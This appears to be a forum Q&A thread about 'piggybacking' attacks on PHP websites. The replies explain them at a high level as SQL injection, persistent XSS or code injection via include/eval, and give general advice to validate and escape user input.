I just read this article about piggy backing in PHP.
I googled it but not so much information there.
Can anyone tell me more details how to prevent this kind of attack, what kind of code practices are vulnable and what we should do?
Thanks in advance.
On
The article isn't particularly clear, but my guess is that they just used SQL injection and, to try to avoid detection, they inserted a script that didn't actually change the behavior of the site normally unless the visitor came from Google using a relevant search term, and the author is calling the redirection in that situation "piggybacking".
So: escape and validate all user input.
On
First link really on the general subject should give you some overview.
Second link is PHP / SQL - specific and should lead you to enlightenment.
On
The BBC news article is talking about "persistent xss". Leave it to the news to talk about hacking without mentioning anything about vulnerabilities. But that could be that the bbc.co.uk dosen't know what an xss vulnerability is, because if they did they would patch their own damn site!.
There are many ways to achieve remote code execution against a PHP web application. No one should ever call this "PHP Injection", if they call it this then they don't know what they are talking about. A Study In Scarlet is an excellent paper that details many different methods that an attacker can use to obtain remote code execution against a PHP application. This paper is intended for malicious hackers, not developers.
XSS is by far the easiest and most common method to nefariously palace advertisements on somebody's site.
That article seems to refer to a vulnerable web application, not anything specific to PHP.
This previous thread provides some useful information regarding writing secure PHP code:
What security issues should I look out for in PHP
If we take the "They used these vulnerabilities to inject PHP code into the site" part of the article literally, then the developers likely used user input with include/require statements or eval